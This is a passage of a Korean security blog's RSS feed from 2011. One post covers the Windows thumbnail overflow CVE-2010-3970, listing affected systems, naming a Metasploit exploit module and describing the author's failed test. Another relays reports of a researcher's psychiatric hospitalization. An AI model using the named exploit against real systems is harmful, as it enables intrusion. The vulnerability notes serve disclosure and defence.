			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>alzip</category>
			<category>alzip 8.12.0.3</category>
			<category>알집</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/128</guid>
			<comments>http://malwarelab.tistory.com/entry/ALZip-81203-Buffer-Overflow-SEH#entry128comment</comments>
			<pubDate>Thu, 20 Jan 2011 18:02:42 +0900</pubDate>
		</item>
		<item>
			<title>사라진 Dancho Danchev 발견!!</title>
			<link>http://malwarelab.tistory.com/entry/%EC%82%AC%EB%9D%BC%EC%A7%84-Dancho-Danchev-%EB%B0%9C%EA%B2%AC</link>
			<description>&lt;P&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile8.uf.tistory.com/original/1772584D4D34ECEC2C69D7&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile8.uf.tistory.com/image/1772584D4D34ECEC2C69D7&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;dancho_danchev_photo_2010.jpg&quot; height=&quot;220&quot; width=&quot;124&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;어제 M86Security Lab의&amp;nbsp; 트위터를 보고 알았습니다. Dancho Danchev가 사라졌다는 사실을요...&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile23.uf.tistory.com/original/182798494D34ECAF196043&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile23.uf.tistory.com/image/182798494D34ECAF196043&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;m86labs_dancho.png&quot; height=&quot;113&quot; width=&quot;546&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
ZDNet 1월 14일자에 기사가 떴습니다.&lt;br /&gt;
&lt;br /&gt;&lt;A href=&quot;http://www.zdnet.com/blog/security/we-need-help-with-the-strange-disappearance-of-dancho-danchev/7897&quot;&gt;http://www.zdnet.com/blog/security/we-need-help-with-the-strange-disappearance-of-dancho-danchev/7897&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
오늘 아침 하우리 최상명 팀장님 트위터에 Dancho Danchev가 불가리아의 한 정신병원에 입원했다는 소식을 접했습니다.&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile23.uf.tistory.com/original/127670474D34ED8C1F3F4E&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile23.uf.tistory.com/image/127670474D34ED8C1F3F4E&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;sionics.png&quot; height=&quot;134&quot; width=&quot;540&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;A href=&quot;http://yro.slashdot.org/story/11/01/15/016241/The-Strange-Disappearance-of-Dancho-Danchev&quot;&gt;http://yro.slashdot.org/story/11/01/15/016241/The-Strange-Disappearance-of-Dancho-Danchev&lt;/A&gt;&lt;br /&gt;
&lt;A href=&quot;http://news.ycombinator.com/item?id=2112135&quot;&gt;http://news.ycombinator.com/item?id=2112135&lt;/A&gt;&lt;br /&gt;
&lt;A href=&quot;http://www.dnevnik.bg/tehnologii/2011/01/17/1026425_ekspertut_po_it_sigurnost_dancho_danchev_e_nastanen_v/&quot;&gt;http://www.dnevnik.bg/tehnologii/2011/01/17/1026425_ekspertut_po_it_sigurnost_dancho_danchev_e_nastanen_v/&lt;/A&gt; (불가리아어)&lt;br /&gt;
&lt;br /&gt;불가리아어로 된 링크를 구글 번역기에서 돌린 내용입니다.&lt;br /&gt;
&lt;br /&gt;Dancho Danchev, an expert on cybersecurity, is accommodated in a Bulgarian hospital. The information was confirmed by two sources of &quot;Diary&quot;, although from the hospital refused comment. &lt;br /&gt;
&lt;br /&gt;As Wired magazine announced a few days ago, he disappeared in September 2010 and did not meet their coordinates. Twenty-six year old Dancho Danchev writes for the blog Zero Day, part of the news site zdnet.com. His last post there is from August 2010 &lt;br /&gt;
&lt;br /&gt;In early September sent an email to the editors of zdnet.com, informing them that the bathroom he installed listening devices. In addition, attached photos of the electric transformer and torn wires on the bulbs. In his letter Dancho Danchev said that the Bulgarian intelligence services follow him because he was recommended by the Attache in Sofia FBI expert on local center against computer threats. &lt;br /&gt;
&lt;br /&gt;Then keep track of Dancho Danchev disappear, but according to reliable source of &quot;Diary&quot; he hospitalized from December 11 onwards. It is now stabilized and will soon be discharged, our source said. &lt;/P&gt;
&lt;P&gt;&lt;br /&gt;
뭔가 음모가 있는듯한 느낌은 저만 받는건지 모르겠지만 아무튼 영화에서나 볼 수 있는 그런 정치적인 냄새가 좀 납니다.&lt;br /&gt;
(영화를 너무 많이 봤나 -_-;;)&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
아무튼 안타깝군요..&lt;br /&gt;
&lt;br /&gt;좋은 분석글과 제로데이 많이 보여주셨었는데 정신병원이라니...&lt;br /&gt;
&lt;br /&gt;마지막 글이 작년 9월 11일인데 이 날짜....참 거시기하군요...-_-;;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;근데 하나 믿기지 않는건&lt;br /&gt;
&lt;br /&gt;Dancho가 26이라는군요..&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/P&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-127-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-127-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-127-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/127&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0xFF small talk</category>
			<category>dancho danchev</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/127</guid>
			<comments>http://malwarelab.tistory.com/entry/%EC%82%AC%EB%9D%BC%EC%A7%84-Dancho-Danchev-%EB%B0%9C%EA%B2%AC#entry127comment</comments>
			<pubDate>Tue, 18 Jan 2011 10:47:12 +0900</pubDate>
		</item>
		<item>
			<title>Microsoft Windows 'CreateSizedDIBSECTION()' Thumbnail View Stack Buffer Overflow</title>
			<link>http://malwarelab.tistory.com/entry/Microsoft-Windows-CreateSizedDIBSECTION-Thumbnail-View-Stack-Buffer-Overflow</link>
			<description>&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&amp;nbsp; &lt;/SPAN&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: 'Malgun Gothic'; FONT-SIZE: 10pt&quot;&gt;&lt;A href=&quot;http://www.securityfocus.com/bid/45662/info&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;http://www.securityfocus.com/bid/45662/info&lt;/SPAN&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: 'Malgun Gothic'; FONT-SIZE: 10pt&quot;&gt;&lt;A href=&quot;http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3970&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3970&lt;/SPAN&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: 'Malgun Gothic'; FONT-SIZE: 10pt&quot;&gt;&lt;A href=&quot;http://moonslab.com/1225&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;http://moonslab.com/1225&lt;/SPAN&gt;&lt;/A&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;영향 받는 취약한 시스템&lt;/SPAN&gt;&lt;br /&gt;
&lt;/STRONG&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Professional x64 Edition SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Professional x64 Edition &lt;/SPAN&gt;&lt;br /&gt;
&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Professional SP3&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Professional SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Professional SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;/FONT&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Professional &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Media Center Edition SP3&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Media Center Edition SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Media Center Edition SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Media Center Edition &lt;/SPAN&gt;&lt;br /&gt;
&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Home SP3&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Home SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP Home SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;/FONT&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP 64-bit Edition SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP 64-bit Edition &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows XP 0&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Vista Ultimate 64-bit edition SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Vista Ultimate 64-bit edition SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Vista Ultimate 64-bit edition 0&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Vista Ultimate SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Vista Ultimate SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Vista Ultimate&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Vista SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Vista SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Vista Home Premium SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Vista Home Premium SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Server 2008 for x64-based Systems SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Server 2008 for x64-based Systems 0&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Server 2008 for Itanium-based Systems SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Server 2008 for Itanium-based Systems 0&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Server 2008 for 32-bit Systems SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Server 2008 for 32-bit Systems 0&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Server 2003 x64 SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Server 2003 x64 SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Server 2003 Itanium SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Server 2003 Itanium SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows Server 2003 Itanium 0&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows 2000 Professional SP4&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows 2000 Professional SP3&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows 2000 Professional SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows 2000 Professional SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;Microsoft Windows 2000 Professional &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;3DM Software Disk Management Software SP2&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;3DM Software Disk Management Software SP1&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;module : windows/fileformat/ms11_xxx_createsizeddibsection&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;div class=&quot;imageblock&quot; style=&quot;display:inline;&quot;&gt;&lt;a href=&quot;http://cfile10.uf.tistory.com/original/150796374D23C6B33686A4&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile10.uf.tistory.com/image/150796374D23C6B33686A4&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;cve-2010-3970.png&quot; height=&quot;530&quot; width=&quot;640&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;/SPAN&gt;&lt;br /&gt;
본 취약점은 미리보기(thumbnail) 했을때 발생하는 취약점입니다.&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock&quot; style=&quot;display:inline;&quot;&gt;&lt;a href=&quot;http://cfile23.uf.tistory.com/original/17622F504D23D2902C64C3&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile23.uf.tistory.com/image/17622F504D23D2902C64C3&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;msf.doc2.png&quot; height=&quot;377&quot; width=&quot;566&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
metasploit에서 생성한 msf.doc 파일을 미리보기로 테스트했는데 데이터 실행 방지 알림 창이 뜨면서 정상적으로 공격이 수행되지 않았습니다. 그래서 강제로 DEP 모드를 해제해고 해봤는데 계속 explorer가 죽는 현상만 반복되었습니다.&lt;br /&gt;
&lt;br /&gt;환경 구성이 잘못되었을지도 모르겠지만 Windows XP SP3라는 가장 일반적인 환경에서 테스트했을때 metasploit의 exploit이 제대로 동작하지 않는 듯 합니다.&lt;br /&gt;
&lt;br /&gt;아직 정식 패치는 발표되지 않았고 임시대응방안은 아래 하우리 사이트를 참조하시기 바랍니다.&lt;br /&gt;
&lt;br /&gt;&lt;A href=&quot;http://www.hauri.co.kr/customer/security/alert_view.html?intSeq=79&amp;amp;page=1&quot;&gt;&lt;A title=&quot;[http://www.hauri.co.kr/customer/security/alert_view.html?intSeq=79&amp;amp;page=1]로 이동합니다.&quot; href=&quot;http://www.hauri.co.kr/customer/security/alert_view.html?intSeq=79&amp;amp;page=1&quot; target=_blank&gt;http://www.hauri.co.kr/customer/security/alert_view.html?intSeq=79&amp;amp;page=1&lt;/A&gt;&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;bonus) 취약점 발견자인&amp;nbsp;Moti와 Xu Hao의 프리젠테이션 파일&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile30.uf@142E8C474D23CF201E5EF1.pdf&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/blog/image/extension/pdf.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Moti &amp;amp; Xu Hao - A Vulnerability in My Heart.pdf&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-126-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-126-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-126-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
